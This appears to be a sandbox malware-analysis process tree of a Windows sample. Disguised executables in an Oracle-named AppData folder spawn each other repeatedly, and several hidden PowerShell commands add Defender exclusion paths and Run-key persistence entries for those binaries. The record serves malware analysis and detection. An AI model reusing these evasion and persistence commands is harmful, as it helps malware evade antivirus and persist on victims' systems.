        powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath" C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe"
1⤵
PID:2152
- C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
  2⤵
  PID:1996
- - C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
    3⤵
    PID:5100
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
      4⤵
      PID:5132
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        5⤵
        
        PID:5956
      - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        6⤵
        
        PID:4772
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        7⤵
        
        PID:4380
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        8⤵
        
        PID:2380
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        9⤵
        
        PID:6068
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        10⤵
        
        PID:4424
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaruntime_platform.exe"
        11⤵
        Modifies registry key
        
        PID:2432
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:1484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaruntime_platform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe\"'"
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath" C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe"
1⤵
PID:5184
- C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
  2⤵
  PID:696
- - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
    3⤵
    PID:5804
  - - C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
      4⤵
      PID:2168
    - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        5⤵
        
        PID:5608
      - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        6⤵
        
        PID:3596
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        7⤵
        
        PID:5956
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        8⤵
        
        PID:2260
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        9⤵
        
        PID:1916
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        10⤵
        
        PID:3804
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        11⤵
        
        PID:1656
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        12⤵
        
        PID:5732
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        13⤵
        
        PID:2308
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        14⤵
        
        PID:5340
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaupdaterw.exe"
        15⤵
        Modifies registry key
        
        PID:3620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaupdaterw.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe\"'"
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5180
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:4572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath" C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe"
1⤵
PID:4620
- C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
  2⤵
  PID:4336
- - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
    3⤵
    PID:3212
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
      4⤵
      PID:1848
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        5⤵
        
        PID:3936
      - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        6⤵
        
        PID:1644
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        7⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        8⤵
        
        PID:2436
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        9⤵
        
        PID:3208
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        10⤵
        
        PID:764
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        11⤵
        
        PID:5316
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        12⤵
        
        PID:4068
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        13⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        14⤵
        
        PID:5664
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        15⤵
        
        PID:5264
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        16⤵
        
        PID:4996
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        17⤵
        
        PID:4200
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        18⤵
        
        PID:3964
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        19⤵
        
        PID:3988
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        20⤵
        
        PID:6076
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        21⤵
        
        PID:4988
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        22⤵
        
        PID:4336
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        23⤵
        
        PID:3596
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        24⤵
        
        PID:4712
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservicew.exe"
        25⤵
        Modifies registry key
        
        PID:2964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservicew.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe\"'"
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath" C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5624
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        26⤵
        
        PID:2308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe"
1⤵
PID:3928
- C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
  2⤵
  PID:4416
- - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
    3⤵
    PID:3108
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
      4⤵
      PID:5888
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        5⤵
        
        PID:5264
      - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        6⤵
        
        PID:2192
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        7⤵
        
        PID:2264
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        8⤵
        
        PID:1188
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        9⤵
        
        PID:4200
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        10⤵
        
        PID:3964
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        11⤵
        
        PID:3900
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        12⤵
        
        PID:5132
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        13⤵
        
        PID:2832
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        14⤵
        
        PID:2172
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        15⤵
        
        PID:4192
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        16⤵
        
        PID:5216
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        17⤵
        
        PID:4696
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        18⤵
        
        PID:3804
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        19⤵
        
        PID:1704
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        20⤵
        
        PID:3092
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        21⤵
        
        PID:5256
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        22⤵
        
        PID:3196
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        23⤵
        
        PID:1656
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        24⤵
        
        PID:2960
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        25⤵
        
        PID:3164
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        26⤵
        
        PID:2444
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        27⤵
        
        PID:3204
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        28⤵
        
        PID:1188
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        29⤵
        
        PID:4716
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        30⤵
        
        PID:3988
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        31⤵
        
        PID:548
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        32⤵
        
        PID:4988
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        33⤵
        
        PID:4400
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        34⤵
        
        PID:4336
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        35⤵
        
        PID:3640
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        36⤵
        
        PID:2260
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        37⤵
        
        PID:1916
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        38⤵
        
        PID:4080
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        39⤵
        
        PID:1388
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        40⤵
        
        PID:4860
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        41⤵
        
        PID:4184
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        42⤵
        
        PID:3852
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        43⤵
        
        PID:4416
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        44⤵
        
        PID:5376
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        45⤵
        
        PID:5976
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        46⤵
        
        PID:3928
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        47⤵
        
        PID:5888
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        48⤵
        
        PID:5916
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        49⤵
        
        PID:60
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        50⤵
        
        PID:4736
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        51⤵
        
        PID:1076
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        52⤵
        
        PID:5336
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        53⤵
        
        PID:4112
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        54⤵
        
        PID:5360
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        55⤵
        
        PID:4380
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        56⤵
        
        PID:3596
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        57⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        58⤵
        
        PID:3640
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        59⤵
        
        PID:2260
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        60⤵
        
        PID:1916
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        61⤵
        
        PID:4080
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        62⤵
        
        PID:1388
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        63⤵
        
        PID:4696
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        64⤵
        
        PID:1704
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        65⤵
        
        PID:6044
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        66⤵
        
        PID:3896
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        67⤵
        
        PID:5976
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        68⤵
        
        PID:1648
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        69⤵
        
        PID:3728
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        70⤵
        
        PID:2264
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        71⤵
        
        PID:4124
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        72⤵
        
        PID:1188
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        73⤵
        
        PID:4260
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        74⤵
        
        PID:3900
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        75⤵
        
        PID:2348
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        76⤵
        
        PID:4380
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        77⤵
        
        PID:4772
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        78⤵
        
        PID:2172
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        79⤵
        
        PID:5316
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        80⤵
        
        PID:512
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        81⤵
        
        PID:6032
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        82⤵
        
        PID:4784
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        83⤵
        
        PID:4832
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        84⤵
        
        PID:2464
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        85⤵
        
        PID:5392
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        86⤵
        
        PID:5920
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        87⤵
        
        PID:5840
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        88⤵
        
        PID:3896
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservice_service.exe"
        89⤵
        Modifies registry key
        
        PID:6048
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        90⤵
        
        PID:3928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath" C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        89⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4092

C:\Windows\SysWOW64\fontdrvhost.exe
"C:\Windows\System32\fontdrvhost.exe"
1⤵
PID:5804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2472 -ip 2472
1⤵
PID:2264

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:5888

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:4796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\sH9oHYT4\vFBg5nSU3JlfVZgZ.exe
1⤵
PID:4960
- C:\Users\Admin\AppData\Local\Temp\sH9oHYT4\vFBg5nSU3JlfVZgZ.exe
  C:\Users\Admin\AppData\Local\Temp\sH9oHYT4\vFBg5nSU3JlfVZgZ.exe
  2⤵
  PID:12260
- - C:\Users\Admin\AppData\Local\Temp\0MbQbcHD\1WLsOO3mmwcivgVH.exe
    C:\Users\Admin\AppData\Local\Temp\0MbQbcHD\1WLsOO3mmwcivgVH.exe 12260
    3⤵
    PID:9036
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9036 -s 656
      4⤵
      Program crash
      PID:25548
- - C:\Users\Admin\AppData\Local\Temp\sH9oHYT4\QPeay7SwpfQQKKHI.exe
    C:\Users\Admin\AppData\Local\Temp\sH9oHYT4\QPeay7SwpfQQKKHI.exe 12260
    3⤵
    PID:8712
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8712 -s 624
      4⤵
      Program crash
      PID:17948

